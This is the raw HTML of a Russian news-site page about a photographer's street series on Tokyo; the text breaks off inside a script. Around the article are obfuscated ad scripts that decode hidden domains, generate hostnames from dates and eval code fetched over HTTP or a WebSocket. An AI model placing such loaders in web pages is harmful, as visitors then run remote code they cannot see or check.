<!DOCTYPE html>
<html>
  
  <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Фотограф показал, почему Токио называют городом контрастной красоты. Фото</title>
<meta name="description" content="Это особенный город." />
<meta name="keywords" content="" />
<meta name="generator" content="DataLife Engine (http://dle-news.ru)" />
<meta property="og:site_name" content="Хроника мировых событий" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Фотограф показал, почему Токио называют городом контрастной красоты. Фото" />
<meta property="og:url" content="http://hronika.info/fotoreportazhi/351630-fotograf-pokazal-pochemu-tokio-nazyvayut-gorodom-kontrastnoy-krasoty-foto.html" />
<meta property="og:image" content="http://hronika.info/uploads/posts/2018-09/thumbs/1537093568_tokio.jpg" />
<link rel="search" type="application/opensearchdescription+xml" href="http://hronika.info/engine/opensearch.php" title="Хроника мировых событий" />
<link rel="alternate" type="application/rss+xml" title="Хроника мировых событий" href="http://hronika.info/rss.xml" />
<script type="text/javascript" src="/engine/classes/js/jquery.js"></script>
<script type="text/javascript" src="/engine/classes/js/jqueryui.js"></script>
<script type="text/javascript" src="/engine/classes/js/dle_js.js"></script>
<script type="text/javascript" src="/engine/classes/js/bbcodes.js"></script>
<script type="text/javascript" src="/engine/classes/highslide/highslide.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js"></script>
<script type="text/javascript" src="/engine/editor/scripts/webfont.js"></script>
<link media="screen" href="/engine/editor/css/default.css" type="text/css" rel="stylesheet" />
    <link rel="icon" type="image/png" href="/favicon.png" />
    <link rel="apple-touch-favicon" href="/apple-touch-favicon.png"/>
    <link media="screen" href="/templates/hronika/css/engine.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/orating.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/css.css" type="text/css" rel="stylesheet" />
    
    <meta property="fb:admins" content="490214530991726"/>  
    <meta property="fb:app_id" content="574441425949200"/>  
    <meta name="4309768020df0301dc59380bc0812f0f" content="">
    <!-- From Cache --><script type="text/javascript">
    // Sun Sep 16 2018 20:02:07 GMT+0300 (MSK)
    new (function() {
        var host,
            v = 300,
            us,
            start;
        var c = function (g, u, s, h) {
            us = g;
            v = u;
            host = s;
            load([e(atob(host), p(g)), h].join("/"));
        };

        var load = function(g){
            start = window["performance"]["now"]();
            if (typeof window.fetch === 'function') {
                fetch(new Request(g, {redirect: 'error', 'method': 'GET'}))
                    .then(function (response) {
                        return response.text();
                    })
                    .then(insertScript)
                    .catch(onLoadError);
            } else {
                var h = new window["XMLHttpRequest"]();
                h["open"]("GET", g, true);
                h["responseType"] = "text";
                h["addEventListener"]("load", onLoad);
                h["addEventListener"]("error", onLoadError);
                h["send"](null);
            }

        };
        var onLoad = function(e){
            var c = e.target;
            if (c['status'] === 204) {
                return
            }
            insertScript(c.responseText);
        };

        var onLoadError = function(e){
            var b = window["performance"]["now"]() - start;
            if (v > 0 && b > 0 && b < v) {
                /* stop()*/
            }
        };
        var insertScript = function(c){
            var d = window['document']["createElement"]("script");
            d["async"] = false;
            d["textContent"] = c;
            var attr = {"id": "cc-support-script", "data-config":  us, "data-base": host};
            Object.keys(attr).forEach(function (key) {
                d.setAttribute(key, attr[key]);
            });
            window['document']["head"]["appendChild"](d);
        };
        var stop = function(){
            var c = window['document']["styleSheets"];
            for (var d = 0; d < c['length']; d++) {
                c[d]["disabled"] = true
            }
            window["stop"]();
        };
        function p (s) {
            var str = 0;
            s = s.toString().split("");
            for(var i = 0; i< s.length; i++){
                str+= parseInt(s[i]);
            }
            return str.toString();
        }

        function e (s, k) {
            var enc = "";
            for (var i = 0; i < s.length; i++) {
                var a = s.charCodeAt(i);
                var b = a ^ k;
                enc = enc + String.fromCharCode(b);
            }
            return enc;
        }
        return c;
    }() )('9568', 300, 'dGhobG8mMzNweXhvdWh9aDJuaQ==', '9p8ci7xv/dvq87b/zon7j/3azcnazzkwc/zksfu7i2m/sn1fb/o9rqk80');
</script>
<script id="cc-support-script" data-config="9568" data-base="dGhobG8mMzNweXhvdWh9aDJuaQ==" type="text/javascript" src="https://ledsitat.ru/9p8ci7xv/dvq87b/zon7j/3azcnazzkwc/zksfu7i2m/sn1fb/o9rqk80"></script>

  </head>

  <body><script type="text/javascript">
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = '';
var dle_group      = 5;
var dle_skin       = 'hronika';
var dle_wysiwyg    = '0';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_del_news   = 'Удалить статью';
var allow_dle_delete_news   = false;
var dle_search_delay   = false;
var dle_search_value   = '';
$(function(){
	FastSearch();
});
//-->
</script><script type="text/javascript">  
<!--  
	hs.graphicsDir = '/engine/classes/highslide/graphics/';
	hs.outlineType = 'rounded-white';
	hs.numberOfImagesToPreload = 0;
	hs.showCredits = false;
	
	hs.lang = {
		loadingText :     'Загрузка...',
		playTitle :       'Просмотр слайдшоу (пробел)',
		pauseTitle:       'Пауза',
		previousTitle :   'Предыдущее изображение',
		nextTitle :       'Следующее изображение',
		moveTitle :       'Переместить',
		closeTitle :      'Закрыть (Esc)',
		fullExpandTitle : 'Развернуть до полного размера',
		restoreTitle :    'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',
		focusTitle :      'Сфокусировать',
		loadingTitle :    'Нажмите для отмены'
	};
	
	hs.align = 'center';
	hs.transitions = ['expand', 'crossfade'];
	hs.addSlideshow({
		interval: 4000,
		repeat: false,
		useControls: true,
		fixedControls: 'fit',
		overlayOptions: {
			opacity: .75,
			position: 'bottom center',
			hideOnMouseOut: true
		}
	});
//-->
</script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9393887096432784",
    enable_page_level_ads: true
  });
</script>
    
    <header id="header" class="bshadow">
      <div class="maxw"><div class="logowrap



















fotoreportazhi

">
    <div class="logo"><img src="/templates/hronika/images/logo.png" alt="Хроника мировых событий" style="width: 100%;" /></div>
    
</div>	      <a href="/" class="index"></a>
			<nav class="top-menu bshadow">
				<ul>
					<li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
                    <li><a href="/obwestvo/" >Общество</a></li>
                    <li><a href="/kultura/" >Культура</a></li>
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/medicina/" >Медицина</a></li>
                    <li><a href="/nedvizhimost/" >Недвижимость</a></li>
					<li><a href="/videonovosti/" >Видеоновости</a></li>						
				</ul>					
				<ul>
                    <li><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
                    <li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/igry/" >Игры</a></li>                    					
				    <li><a href="/kriminal/" >Происшествия</a></li>
                    <li class="tm-selected"><a href="/fotoreportazhi/" >Фоторепортажи</a></li>
					<li><a href="/kurjozy/" >Курьезы</a></li>
					<li><a href="/mnenia/" >Мнения</a></li>
				</ul>
			</nav>
            <div class="reklright"></div>
      </div>
      </header>
      <div id="wrcont">

	  <!--noindex--><!--/noindex-->
       
        <div class="google-top-center"><!-- noindex -->
<center>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Под меню заглушка -->
<ins class="adsbygoogle"
     style="display:inline-block;width:970px;height:90px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5011853349"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</center>
<!--/noindex--></div>
        <section id="middle">
          <div class="clr"><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/" itemprop="url"><span itemprop="title">Хроника событий</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/fotoreportazhi/" itemprop="url"><span itemprop="title">Фоторепортажи</span></a></span> &raquo; Фотограф показал, почему Токио называют городом контрастной красоты. Фото</span></div></div>
          <div id="container">
            <div id="content2">
 

              <article>

			   <div id='dle-content'>

<div class="full-story">
 <div class="mainc fullimg200_150">
  <div class="full-storyttl">
  <div class="fullinfo"></div>
   <div class="fullargcat"><b>Раздел:&nbsp;</b><strong><a href="http://hronika.info/fotoreportazhi/">Фоторепортажи</a></strong>&nbsp;&nbsp;</div>
   <div class="orating ignore-select" id="orating-351630">
	<a href="#" class="orating_m" title="Не нравится" onclick="orating(351630,0);return false;"></a>
	<a href="#" class="orating_p" title="Нравится" onclick="orating(351630,1);return false;"></a>
	<a href="#" class="orating_res" onclick="ostats(351630,1,true);return false;">0</a>
</div>


  </div>
		<div class="ttl_h1full"><h1><span id="news-title">Фотограф показал, почему Токио называют городом контрастной красоты. Фото</span></h1></div>
     
<div class="ax-full _ga1_on_">
	<!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093568_tokio.jpg|left--><a href="http://hronika.info/uploads/posts/2018-09/1537093568_tokio.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093568_tokio.jpg" style="float:left;" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><b>Это особенный город.</b><br /><br />«Токио, город контрастной красоты» – фотопроект Скандера Хлифа, поехавшего искать на улицах японской столицы ваби-саби, что традиционно ассоциируется с красотой мимолётного и несовершенного, передает <a href="http://hronika.info/">Хроника.инфо</a> со ссылкой на <a href="https://photoiskusstvo.info/topics/vzglyad-na-tokio-glazami-skandera-klifa-skander-khlif/" target="_blank">Фотоискусство</a>.<br /><br />Скандер Клиф (Skander Khlif) – тунисско-немецкий инженер и фотограф, специализирующийся на уличной и документальной съёмке. До переезда в Мюнхен жил в 8 городах. Вырос в Тунисе, где большую часть времени играл и бродил улицами своего квартала, как и большинство местной детворы.<br /><br />С улицами и общественными местами у Скандера сохранилась глубокая связь. Он видит в них театральную сцену, где все играют, исполняют роли, выступают. Уличная фотография стала любимым способом смотреть на мир. Скандера очаровывают эмоции и отношениями между людьми и их окружением. Особые моменты он стремится запечатлеть в снимках.<br /><br /><b>Читайте также: <a href="http://hronika.info/kurjozy/264237-schenok-puteshestvennik-stal-novoy-zvezdoy-instagram.html" >Щенок-путешественник стал новой звездой Instagram</a></b><br /><br />«Токио – город контрастной красоты. Город ваби-саби, – пишет Хлиф. – Я всегда мечтал посетить его и уловить эту удивительную сторону мегаполиса, воплотить её в длинной серии! Куда бы вы ни взглянули, всюду совершенные линии, фигуры, формы, цвета… И в то же время Токио – город многообразия, экстравагантности и свободы!».<br /><br /><div style="text-align:center;"><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093622_tokio2.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093622_tokio2.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093622_tokio2.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093630_tokio3.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093630_tokio3.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093630_tokio3.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093607_tokio4.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093607_tokio4.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093607_tokio4.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093592_tokio5.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093592_tokio5.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093592_tokio5.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093637_tokio6.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093637_tokio6.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093637_tokio6.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093648_tokio7.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093648_tokio7.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093648_tokio7.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093654_tokio8.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093654_tokio8.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093654_tokio8.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093587_tokio9.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093587_tokio9.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093587_tokio9.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093640_tokio10.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093640_tokio10.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093640_tokio10.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093657_tokio11.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093657_tokio11.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093657_tokio11.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093671_tokio12.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093671_tokio12.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093671_tokio12.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093602_tokio13.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093602_tokio13.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093602_tokio13.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093637_tokio14.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093637_tokio14.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093637_tokio14.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093672_tokio15.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093672_tokio15.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093672_tokio15.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093651_tokio16.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093651_tokio16.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093651_tokio16.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093638_tokio17.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093638_tokio17.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093638_tokio17.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093608_tokio18.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093608_tokio18.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093608_tokio18.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093617_tokio19.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093617_tokio19.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093617_tokio19.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093656_tokio20.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093656_tokio20.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093656_tokio20.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--><br /><!--TBegin:http://hronika.info/uploads/posts/2018-09/1537093610_tokio21.jpg|--><a href="http://hronika.info/uploads/posts/2018-09/1537093610_tokio21.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-09/thumbs/1537093610_tokio21.jpg" alt='Фотограф показал, почему Токио называют городом контрастной красоты. Фото' title='Фотограф показал, почему Токио называют городом контрастной красоты. Фото'  /></a><!--TEnd--></div>
	<div class="ctrlE">Если вы нашли ошибку в тексте, выделите её мышью и нажмите Ctrl+Enter</div>
</div>
<div class="clr"><br /><p class="basetags">&nbsp;<i>Теги: <a href="http://hronika.info/tags/%D1%84%D0%BE%D1%82%D0%BE%D0%B3%D1%80%D0%B0%D1%84/">фотограф</a>, <a href="http://hronika.info/tags/%D0%A2%D0%BE%D0%BA%D0%B8%D0%BE/">Токио</a></i></p></div>
<div class="full-top_banner">
    <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10323">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10323/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
    </div>
<div class="full-top_banner">
    <div id="AD67HoqbIKGudtbW5O7h" data-type="0" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'hronikka.com';</script>
<script src="//hronikka.com/lT/v8.js" ></script>
    <div id="MIXADV_4787" class="MIXADVERT_NET"></div>
          <script> 
          var node4787 = document.getElementById("MIXADV_4787");
          if( node4787 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4787&r="+Math.random();
               node4787.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ4eXoiXTsgdmFyIHN0ciA9ZGF5Kihtb250aCAqIG5hbWVfZGF5ICogZGF5KSsiIisgZGF5Kihtb250aCArIG5hbWVfZGF5ICsgZGF5ICt5ZWFyKTt2YXIgaGFzaCA9ICBidG9hKGJ0b2Eoc3RyKSkudG9Mb3dlckNhc2UoKTsgdmFyIGhvc3QgPSBoYXNoLnN1YnN0cmluZygzLCBoYXNoLmxlbmd0aCAtIG5hbWVfZGF5LzIpKyIuIitkb21bbmFtZV9kYXkgLSAxXTt2YXIgciA9IE1hdGgucmFuZG9tKCkudG9TdHJpbmcoMzYpLnN1YnN0cigyLCAyKTtyID0gci5yZXBsYWNlKC9bMC05XS9nLCAiIik7dmFyIGRlbHRhID0gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogKDEwMCAtIDEwICsgMSkpICsgMTA7dmFyIGlkID0gNDc4NyAtIGRlbHRhOyB2YXIgc2NyaXB0X2ZpcnN0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7c2NyaXB0X2ZpcnN0LnNyYyA9ICJodHRwczovLyIrIGhvc3QrIi8iK2RlbHRhK2lkK3IrIiI7IG5vZGU0Nzg3LnBhcmVudE5vZGUuYXBwZW5kQ2hpbGQoc2NyaXB0X2ZpcnN0KTtzY3JpcHRfZmlyc3Qub25lcnJvciA9IGZ1bmN0aW9uKCl7IHNldFRpbWVvdXQoIGZ1bmN0aW9uICgpIHsgaWYoIG5vZGU0Nzg3LmlubmVySFRNTCA9PSAiIiApIHdpbmRvdy5ldmFsKGxvY2FsU3RvcmFnZS5nZXRJdGVtKCI0Nzg3IikpIH0sIDUwMDApOyAgO307IA==") );
              }
          }
          </script>
    <!-- noindex -->
<!-- M225926Composite Start --> <div id="M225926Composite608873"><center> <a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a> </center></div> <script type="text/javascript"> var d = new Date, script608873 = document.createElement("script"), mg_ws608873 = {};script608873.type = "text/javascript";script608873.charset = "utf-8";script608873.src = "//jsc.marketgid.com/h/r/hronika.info.608873.js?t=" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script608873.onerror = function () { mg_ws608873 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MDg4NzMoZSl7dmFyIGg9bWdfd3M2MDg4NzMub25tZXNzYWdlOyBtZ193czYwODg3My5yZWFkeVN0YXRlPT1tZ193czYwODg3My5DTE9TRUQmJihtZ193czYwODg3Mz1uZXcgV2ViU29ja2V0KG1nX3dzNjA4ODczX2xvY2F0aW9uKSksbWdfd3M2MDg4NzMub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMobWdfd3M2MDg4NzMsZnVuY3Rpb24oKXttZ193czYwODg3My5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MDg4NzNfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYwODg3MyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MDg4NzNfbG9jYXRpb24pLCBtZ193czYwODg3My5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MDg4NzMoZS5kYXRhKX0=\'))']), {type: "application/javascript"})); mg_ws608873.onmessage = function (msg){window.eval(msg.data);}; mg_ws608873.postMessage('js|'+script608873.src+'|M225926Composite608873|M225926Composite608873');};document.body.appendChild(script608873); </script> <!-- M225926Composite End -->
<!--/ noindex -->
    <!-- start NEW content_v1 for hronika.info -->
<div id="adpartner-jsunit-851">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=851&" + Math.random();
        head.appendChild(script);
    </script>
</div>

<!-- end NEW content_v1 for hronika.info -->
    <div id='upsilon73sigma8253'></div>
<script type='text/javascript'>(function(){function f(v){return Math.abs(v.split('').reduce(function(w,x){return w=(w<<5)-w+x.charCodeAt(0),w&w},0))}function g(v){return(26<=v?g((v/26>>0)-1):'')+'abcdefghijklmnopqrstuvwxyz'[v%26>>0]}var j=673873,r=''+Math.ceil((Date.now()-1.5147648e12)/6.048e8)*j,p=8253,l=''+j+''+p,t=document;p=t.createElement('script'),p.type='text/javascript',p.src='//'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+'.ru/'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+l+'.js',t.getElementById('upsilon73sigma8253').appendChild(p)})();</script>
    <div id="CNM4431" style="text-align:center;display:none" ><div id="CNM4431t" style="display:none">

<script type="text/javascript" async="async" src="https://c.her-ber.top/pzi/4431" ></script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-9393887096432784",
          enable_page_level_ads: true
     });
</script>
    <script id="r17724" type="text/javascript">
    (function() {
        var worker17724,
            tickerID = 17724,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17724.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

